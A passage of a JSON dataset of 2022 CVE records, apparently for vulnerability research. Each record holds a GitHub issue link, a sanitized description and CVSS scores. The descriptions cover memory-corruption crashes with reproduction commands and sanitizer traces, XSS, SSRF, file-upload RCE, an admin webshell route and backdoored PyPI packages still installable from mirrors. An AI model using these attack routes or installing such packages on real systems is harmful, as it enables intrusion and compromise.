  84037. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/73",
  84038. "Repo_new": "thorfdbg/libjpeg",
  84039. "Issue_Created_At": "2022-05-30T12:33:53Z",
  84040. "description": "null pointer dereference in APITAG in APITAG reproduce steps NUMBERTAG compile libjpeg with address sanitizer NUMBERTAG run APITAG poc FILETAG stack trace ERRORTAG",
  84041. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84042. "severity": "MEDIUM",
  84043. "baseScore": 5.5,
  84044. "impactScore": 3.6,
  84045. "exploitabilityScore": 1.8
  84046. },
  84047. {
  84048. "CVE_ID": "CVE-2022-32202",
  84049. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/74",
  84050. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/74",
  84051. "Repo_new": "thorfdbg/libjpeg",
  84052. "Issue_Created_At": "2022-05-31T09:21:46Z",
  84053. "description": "null pointer dereference in APITAG in APITAG stack trace ERRORTAG poc: FILETAG reproduce: compile libjpeg with address sanitizer run ./jpeg ./poc /dev/null",
  84054. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84055. "severity": "MEDIUM",
  84056. "baseScore": 5.5,
  84057. "impactScore": 3.6,
  84058. "exploitabilityScore": 1.8
  84059. },
  84060. {
  84061. "CVE_ID": "CVE-2022-32298",
  84062. "Issue_Url_old": "https://github.com/landley/toybox/issues/346",
  84063. "Issue_Url_new": "https://github.com/landley/toybox/issues/346",
  84064. "Repo_new": "landley/toybox",
  84065. "Issue_Created_At": "2022-05-23T05:44:46Z",
  84066. "description": "Null pointer dereference in httpd.c. poc APITAG crash scene ERRORTAG Analysis It seems that the code does not handle the case where the return value of xabspath is NULL, which leads to a subsequent dereference of that NULL pointer; tracing back to the APITAG line, when the condition there is true it returns NULL. I think this is a code path that was not considered. Since it is reachable in the httpd network service, a remote client can trigger a denial of service. discoverer Taolaw MENTIONTAG Team of Vecentek",
  84067. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  84068. "severity": "HIGH",
  84069. "baseScore": 7.5,
  84070. "impactScore": 3.6,
  84071. "exploitabilityScore": 3.9
  84072. },
  84073. {
  84074. "CVE_ID": "CVE-2022-32324",
  84075. "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/144",
  84076. "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/144",
  84077. "Repo_new": "kermitt2/pdfalto",
  84078. "Issue_Created_At": "2022-06-01T07:31:05Z",
  84079. "description": "heap buffer overflow found?. sample here: FILETAG Describe info\uff1a $ ./pdfalto PATHTAG PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f1 at pc NUMBERTAG f NUMBERTAG b bp NUMBERTAG fff NUMBERTAG e8f0f0 sp NUMBERTAG fff NUMBERTAG e8e8a0 WRITE of size NUMBERTAG at NUMBERTAG f1 thread T NUMBERTAG f NUMBERTAG a in strncat PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f8cfec7dc NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ca9 in _start ( PATHTAG NUMBERTAG f1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b NUMBERTAG in malloc PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f8cfec7dc NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in strncat Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca 
redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  84080. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84081. "severity": "CRITICAL",
  84082. "baseScore": 9.8,
  84083. "impactScore": 5.9,
  84084. "exploitabilityScore": 3.9
  84085. },
  84086. {
  84087. "CVE_ID": "CVE-2022-32325",
  84088. "Issue_Url_old": "https://github.com/tjko/jpegoptim/issues/107",
  84089. "Issue_Url_new": "https://github.com/tjko/jpegoptim/issues/107",
  84090. "Repo_new": "tjko/jpegoptim",
  84091. "Issue_Created_At": "2022-06-02T01:51:47Z",
  84092. "description": "SEGV caused by a READ memory access. hi, with the help of fuzzing ,I found some crash sample in this repo, here is the sample, are they new bugs? crash position APITAG crash sample: APITAG sample here: FILETAG command: ./jpegoptim f all progressive crash_sample APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address (pc NUMBERTAG f NUMBERTAG c NUMBERTAG ca NUMBERTAG bp NUMBERTAG c NUMBERTAG sp NUMBERTAG ffe NUMBERTAG c NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used NUMBERTAG f NUMBERTAG c NUMBERTAG ca NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG cad NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c8e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG c6 in jpeg_consume_input ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG f in jpeg_read_header ( PATHTAG NUMBERTAG f7f0d in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG cf NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING crash position: APITAG crash sample: APITAG sample here: FILETAG command: ./jpegoptim f all progressive crash_sample NUMBERTAG ERROR: APITAG SEGV on unknown address (pc NUMBERTAG f NUMBERTAG bp NUMBERTAG c NUMBERTAG sp NUMBERTAG fffe NUMBERTAG e NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG this fault was caused by a dereference of a high value address (see register values below). 
Disassemble the provided pc to learn which register was used NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG ed in jpeg_read_coefficients ( PATHTAG NUMBERTAG f8c9a in main PATHTAG NUMBERTAG f NUMBERTAG cdfc NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG cf NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING",
  84093. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84094. "severity": "MEDIUM",
  84095. "baseScore": 6.5,
  84096. "impactScore": 3.6,
  84097. "exploitabilityScore": 2.8
  84098. },
  84099. {
  84100. "CVE_ID": "CVE-2022-32406",
  84101. "Issue_Url_old": "https://github.com/TTimo/GtkRadiant/issues/676",
  84102. "Issue_Url_new": "https://github.com/ttimo/gtkradiant/issues/676",
  84103. "Repo_new": "ttimo/gtkradiant",
  84104. "Issue_Created_At": "2022-01-12T18:10:15Z",
  84105. "description": "Buffer overflow in q3map2 when parsing malformed MAP file. Hi folks, A buffer overflow was found while fuzz testing the q3map2 binary; it can be triggered via a malformed MAP file with an overlong shader image name. Although this particular file only crashes the program as is, a further-crafted file could turn the memory corruption into a security issue by compromising the process's memory. It is recommended to harden the code (e.g. bound the copied shader image name to its destination buffer) to prevent this and similar future bugs. crash files CODETAG debug log CODETAG",
  84106. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84107. "severity": "MEDIUM",
  84108. "baseScore": 5.5,
  84109. "impactScore": 3.6,
  84110. "exploitabilityScore": 1.8
  84111. },
  84112. {
  84113. "CVE_ID": "CVE-2022-32411",
  84114. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/18",
  84115. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/18",
  84116. "Repo_new": "neeke/hongcms",
  84117. "Issue_Created_At": "2022-06-02T01:30:10Z",
  84118. "description": "APITAG NUMBERTAG getshell via the language config file. APITAG to the backend as the administrator; APITAG need to access the page\" FILETAG \" APITAG NUMBERTAG Because the language configuration file has a .php suffix, an administrator who can edit it can write arbitrary PHP into it and obtain a webshell. APITAG NUMBERTAG so\uff0csimply connect to this language config file and you get a shell. APITAG",
  84119. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  84120. "severity": "HIGH",
  84121. "baseScore": 7.2,
  84122. "impactScore": 5.9,
  84123. "exploitabilityScore": 1.2
  84124. },
  84125. {
  84126. "CVE_ID": "CVE-2022-32413",
  84127. "Issue_Url_old": "https://github.com/bihell/Dice/issues/157",
  84128. "Issue_Url_new": "https://github.com/bihell/dice/issues/157",
  84129. "Repo_new": "bihell/dice",
  84130. "Issue_Created_At": "2022-06-02T02:09:43Z",
  84131. "description": "Arbitrary file upload vulnerability. APITAG file upload vulnerability in the following code can cause RCE FILETAG APITAG up the APITAG are directly uploaded to the server without filtering FILETAG",
  84132. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84133. "severity": "CRITICAL",
  84134. "baseScore": 9.8,
  84135. "impactScore": 5.9,
  84136. "exploitabilityScore": 3.9
  84137. },
  84138. {
  84139. "CVE_ID": "CVE-2022-32414",
  84140. "Issue_Url_old": "https://github.com/nginx/njs/issues/483",
  84141. "Issue_Url_new": "https://github.com/nginx/njs/issues/483",
  84142. "Repo_new": "nginx/njs",
  84143. "Issue_Created_At": "2022-03-02T11:46:31Z",
  84144. "description": "SEGV APITAG in njs_vmcode_interpreter. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  84145. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84146. "severity": "MEDIUM",
  84147. "baseScore": 5.5,
  84148. "impactScore": 3.6,
  84149. "exploitabilityScore": 1.8
  84150. },
  84151. {
  84152. "CVE_ID": "CVE-2022-32417",
  84153. "Issue_Url_old": "https://github.com/Snakinya/Vuln/issues/1",
  84154. "Issue_Url_new": "https://github.com/snakinya/vuln/issues/1",
  84155. "Repo_new": "Snakinya/Vuln",
  84156. "Issue_Created_At": "2022-08-04T10:38:48Z",
  84157. "description": "pboot cms NUMBERTAG RCE. \u6f0f\u6d1e\u8be6\u60c5\uff1a URLTAG \u58f0\u660e APITAG APITAG APITAG",
  84158. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84159. "severity": "CRITICAL",
  84160. "baseScore": 9.8,
  84161. "impactScore": 5.9,
  84162. "exploitabilityScore": 3.9
  84163. },
  84164. {
  84165. "CVE_ID": "CVE-2022-32442",
  84166. "Issue_Url_old": "https://github.com/u5cms/u5cms/issues/49",
  84167. "Issue_Url_new": "https://github.com/u5cms/u5cms/issues/49",
  84168. "Repo_new": "u5cms/u5cms",
  84169. "Issue_Created_At": "2022-06-04T01:45:49Z",
  84170. "description": "XSS vulnerability in u5cms version NUMBERTAG SS vulnerability in u5cms version NUMBERTAG Cross site Scripting (XSS) refers to client side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates. When I access the default home page on the web, if the parameter passed in is APITAG , it can be found that the passed in parameters appear in the href attribute of a tag in the page. FILETAG Then view the source code,you can find the entered parameters and their existence in the href attribute of the a tag FILETAG If the parameter passed in is a payload carefully constructed by the attacker, it may cause more serious HTML injection. And if possible, I strongly suggest you check more carefully whether the parameters entered by the user are legal when handling user input and output in the program. Best wishes!",
  84171. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84172. "severity": "MEDIUM",
  84173. "baseScore": 6.1,
  84174. "impactScore": 2.7,
  84175. "exploitabilityScore": 2.8
  84176. },
  84177. {
  84178. "CVE_ID": "CVE-2022-32444",
  84179. "Issue_Url_old": "https://github.com/u5cms/u5cms/issues/50",
  84180. "Issue_Url_new": "https://github.com/u5cms/u5cms/issues/50",
  84181. "Repo_new": "u5cms/u5cms",
  84182. "Issue_Created_At": "2022-06-04T03:15:07Z",
  84183. "description": "URL redirection vulnerability in u5cms NUMBERTAG URL redirection vulnerability in u5cms NUMBERTAG This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting. By modifying the parameters, the attacker can make the user jump to the phishing web page to realize the attack. URL redirection vulnerability exists in FILETAG . When the user accesses the address constructed by the attacker, the web page will be redirected to the address pointed to by the parameter \"u\", instead of u5cms' own web page. The payload is APITAG When users access this URL, the browser will be redirected to ERRORTAG Here are the HTTP request and HTTP response. HTTP request: CODETAG HTTP response: CODETAG Eventually, the browser will be redirected to ERRORTAG FILETAG If possible, I suggest you check whether the end of the domain name is the current domain name during the development process. If yes, the browser will jump. Otherwise, you should filter out illegal parameters. Best wishes!",
  84184. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84185. "severity": "MEDIUM",
  84186. "baseScore": 6.1,
  84187. "impactScore": 2.7,
  84188. "exploitabilityScore": 2.8
  84189. },
  84190. {
  84191. "CVE_ID": "CVE-2022-32978",
  84192. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/75",
  84193. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/75",
  84194. "Repo_new": "thorfdbg/libjpeg",
  84195. "Issue_Created_At": "2022-06-08T09:09:39Z",
  84196. "description": "Abort in APITAG . stack trace ERRORTAG poc FILETAG reproduce run APITAG",
  84197. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84198. "severity": "MEDIUM",
  84199. "baseScore": 6.5,
  84200. "impactScore": 3.6,
  84201. "exploitabilityScore": 2.8
  84202. },
  84203. {
  84204. "CVE_ID": "CVE-2022-32994",
  84205. "Issue_Url_old": "https://github.com/zongdeiqianxing/cve-reports/issues/1",
  84206. "Issue_Url_new": "https://github.com/zongdeiqianxing/cve-reports/issues/1",
  84207. "Repo_new": "zongdeiqianxing/cve-reports",
  84208. "Issue_Created_At": "2022-06-06T06:43:34Z",
  84209. "description": "Halo cms NUMBERTAG has an arbitrary format file upload vulnerability at PATHTAG URLTAG Halo cms NUMBERTAG has an arbitrary format file upload vulnerability at PATHTAG Attackers can upload files in formats such as jsp\u3001html etc. Proof of Concept ERRORTAG FILETAG FILETAG permalink: APITAG L NUMBERTAG URLTAG Security is not checked in the relevant code FILETAG",
  84210. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84211. "severity": "CRITICAL",
  84212. "baseScore": 9.8,
  84213. "impactScore": 5.9,
  84214. "exploitabilityScore": 3.9
  84215. },
  84216. {
  84217. "CVE_ID": "CVE-2022-32995",
  84218. "Issue_Url_old": "https://github.com/zongdeiqianxing/cve-reports/issues/2",
  84219. "Issue_Url_new": "https://github.com/zongdeiqianxing/cve-reports/issues/2",
  84220. "Repo_new": "zongdeiqianxing/cve-reports",
  84221. "Issue_Created_At": "2022-06-06T07:47:20Z",
  84222. "description": "There is an ssrf vulnerability in the template remote download function in halo cms NUMBERTAG in halo dev/halo. URLTAG There is an ssrf vulnerability in the template remote download function in halo cms NUMBERTAG The attacker needs to enter a link that ends with a zip , such as FILETAG Proof of Concept CODETAG FILETAG FILETAG permalink: APITAG L NUMBERTAG URLTAG The destination address is not limited in the code, so it can cause ssrf vulnerability FILETAG",
  84223. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84224. "severity": "CRITICAL",
  84225. "baseScore": 9.8,
  84226. "impactScore": 5.9,
  84227. "exploitabilityScore": 3.9
  84228. },
  84229. {
  84230. "CVE_ID": "CVE-2022-32996",
  84231. "Issue_Url_old": "https://github.com/josubg/django_navbar_client/issues/1",
  84232. "Issue_Url_new": "https://github.com/josubg/django_navbar_client/issues/1",
  84233. "Repo_new": "josubg/django_navbar_client",
  84234. "Issue_Created_At": "2022-06-06T07:11:51Z",
  84235. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install django navbar client NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84236. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84237. "severity": "CRITICAL",
  84238. "baseScore": 9.8,
  84239. "impactScore": 5.9,
  84240. "exploitabilityScore": 3.9
  84241. },
  84242. {
  84243. "CVE_ID": "CVE-2022-32997",
  84244. "Issue_Url_old": "https://github.com/miranov25/RootInteractive/issues/206",
  84245. "Issue_Url_new": "https://github.com/miranov25/rootinteractive/issues/206",
  84246. "Repo_new": "miranov25/rootinteractive",
  84247. "Issue_Created_At": "2022-06-08T02:30:56Z",
  84248. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG",
  84249. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84250. "severity": "CRITICAL",
  84251. "baseScore": 9.8,
  84252. "impactScore": 5.9,
  84253. "exploitabilityScore": 3.9
  84254. },
  84255. {
  84256. "CVE_ID": "CVE-2022-32998",
  84257. "Issue_Url_old": "https://github.com/serhatci/cryptocurrency-historical-data-downloader/issues/8",
  84258. "Issue_Url_new": "https://github.com/serhatci/cryptocurrency-historical-data-downloader/issues/8",
  84259. "Repo_new": "serhatci/cryptocurrency-historical-data-downloader",
  84260. "Issue_Created_At": "2022-06-08T02:46:10Z",
  84261. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install cryptoasset data downloader NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84262. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84263. "severity": "CRITICAL",
  84264. "baseScore": 9.8,
  84265. "impactScore": 5.9,
  84266. "exploitabilityScore": 3.9
  84267. },
  84268. {
  84269. "CVE_ID": "CVE-2022-32999",
  84270. "Issue_Url_old": "https://github.com/SilvioGiancola/CloudLabeling-API/issues/1",
  84271. "Issue_Url_new": "https://github.com/silviogiancola/cloudlabeling-api/issues/1",
  84272. "Repo_new": "silviogiancola/cloudlabeling-api",
  84273. "Issue_Created_At": "2022-06-08T07:06:56Z",
  84274. "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install cloudlabeling NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84275. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84276. "severity": "CRITICAL",
  84277. "baseScore": 9.8,
  84278. "impactScore": 5.9,
  84279. "exploitabilityScore": 3.9
  84280. },
  84281. {
  84282. "CVE_ID": "CVE-2022-33001",
  84283. "Issue_Url_old": "https://github.com/bOrionis/AAmiles/issues/1",
  84284. "Issue_Url_new": "https://github.com/borionis/aamiles/issues/1",
  84285. "Repo_new": "borionis/aamiles",
  84286. "Issue_Created_At": "2022-06-09T14:17:05Z",
  84287. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84288. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84289. "severity": "CRITICAL",
  84290. "baseScore": 9.8,
  84291. "impactScore": 5.9,
  84292. "exploitabilityScore": 3.9
  84293. },
  84294. {
  84295. "CVE_ID": "CVE-2022-33002",
  84296. "Issue_Url_old": "https://github.com/smoothnlp/KGExplore/issues/13",
  84297. "Issue_Url_new": "https://github.com/smoothnlp/kgexplore/issues/13",
  84298. "Repo_new": "smoothnlp/kgexplore",
  84299. "Issue_Created_At": "2022-06-10T06:26:22Z",
  84300. "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project in APITAG and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install kgexplore i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84301. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84302. "severity": "CRITICAL",
  84303. "baseScore": 9.8,
  84304. "impactScore": 5.9,
  84305. "exploitabilityScore": 3.9
  84306. },
  84307. {
  84308. "CVE_ID": "CVE-2022-33003",
  84309. "Issue_Url_old": "https://github.com/wateraccounting/watools/issues/5",
  84310. "Issue_Url_new": "https://github.com/wateraccounting/watools/issues/5",
  84311. "Repo_new": "wateraccounting/watools",
  84312. "Issue_Created_At": "2022-06-10T07:17:38Z",
  84313. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install watools i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
  84314. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84315. "severity": "CRITICAL",
  84316. "baseScore": 9.8,
  84317. "impactScore": 5.9,
  84318. "exploitabilityScore": 3.9
  84319. },
  84320. {
  84321. "CVE_ID": "CVE-2022-33004",
  84322. "Issue_Url_old": "https://github.com/Dreambuilder4028/coder/issues/1",
  84323. "Issue_Url_new": "https://github.com/dreambuilder4028/coder/issues/1",
  84324. "Repo_new": "dreambuilder4028/coder",
  84325. "Issue_Created_At": "2022-06-12T05:47:12Z",
  84326. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install beginner NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84327. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84328. "severity": "CRITICAL",
  84329. "baseScore": 9.8,
  84330. "impactScore": 5.9,
  84331. "exploitabilityScore": 3.9
  84332. },
  84333. {
  84334. "CVE_ID": "CVE-2022-33009",
  84335. "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/30",
  84336. "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/30",
  84337. "Repo_new": "eddy8/lightcms",
  84338. "Issue_Created_At": "2022-06-06T16:26:44Z",
  84339. "description": "A stored cross site scripting (XSS) vulnerability exists in APITAG \"contents\" field. A stored cross site scripting (XSS) vulnerability exists in APITAG that allows an user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack NUMBERTAG login as admin in the article page FILETAG NUMBERTAG create a new article FILETAG NUMBERTAG upload the malicious pdf. the content of FILETAG : CODETAG NUMBERTAG back to content then wo edit this upload: FILETAG NUMBERTAG when user click the link it will trigger a XSS attack FILETAG FILETAG",
  84340. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  84341. "severity": "MEDIUM",
  84342. "baseScore": 4.8,
  84343. "impactScore": 2.7,
  84344. "exploitabilityScore": 1.7
  84345. },
  84346. {
  84347. "CVE_ID": "CVE-2022-33021",
  84348. "Issue_Url_old": "https://github.com/openhwgroup/cva6/issues/884",
  84349. "Issue_Url_new": "https://github.com/openhwgroup/cva6/issues/884",
  84350. "Repo_new": "openhwgroup/cva6",
  84351. "Issue_Created_At": "2022-05-24T22:43:58Z",
  84352. "description": "FILETAG FILETAG",
  84353. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  84354. "severity": "HIGH",
  84355. "baseScore": 7.5,
  84356. "impactScore": 3.6,
  84357. "exploitabilityScore": 3.9
  84358. },
  84359. {
  84360. "CVE_ID": "CVE-2022-33023",
  84361. "Issue_Url_old": "https://github.com/openhwgroup/cva6/issues/885",
  84362. "Issue_Url_new": "https://github.com/openhwgroup/cva6/issues/885",
  84363. "Repo_new": "openhwgroup/cva6",
  84364. "Issue_Created_At": "2022-05-25T00:52:21Z",
  84365. "description": "FILETAG Our testcase shows cva6 will not throw illegal instruction exception in this case while spike does at line NUMBERTAG FILETAG The testcase mem file, rtl trace log, and spike trace log are attached. FILETAG Thank you",
  84366. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  84367. "severity": "HIGH",
  84368. "baseScore": 7.5,
  84369. "impactScore": 3.6,
  84370. "exploitabilityScore": 3.9
  84371. },
  84372. {
  84373. "CVE_ID": "CVE-2022-33024",
  84374. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/492",
  84375. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/492",
  84376. "Repo_new": "libredwg/libredwg",
  84377. "Issue_Created_At": "2022-06-07T01:43:47Z",
  84378. "description": "Assertion dwg2dxf: APITAG int APITAG BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, APITAG , APITAG ): Assertion ERRORTAG !dat >bit' failed. Aborted poc URLTAG",
  84379. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  84380. "severity": "HIGH",
  84381. "baseScore": 7.5,
  84382. "impactScore": 3.6,
  84383. "exploitabilityScore": 3.9
  84384. },
  84385. {
  84386. "CVE_ID": "CVE-2022-33025",
  84387. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/487",
  84388. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/487",
  84389. "Repo_new": "libredwg/libredwg",
  84390. "Issue_Created_At": "2022-06-07T01:31:30Z",
  84391. "description": "heap use after free exists in the function APITAG in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG ffff7e NUMBERTAG at pc NUMBERTAG ca bp NUMBERTAG fffffffc8b0 sp NUMBERTAG fffffffc8a8 READ of size NUMBERTAG at NUMBERTAG ffff7e NUMBERTAG thread T NUMBERTAG c9 in APITAG PATHTAG NUMBERTAG d0a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG ffff7e NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG d NUMBERTAG in realloc PATHTAG NUMBERTAG a NUMBERTAG b5 in dwg_add_object PATHTAG previously allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG a NUMBERTAG in dwg_add_object PATHTAG SUMMARY: APITAG heap use after free PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG efbeab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG 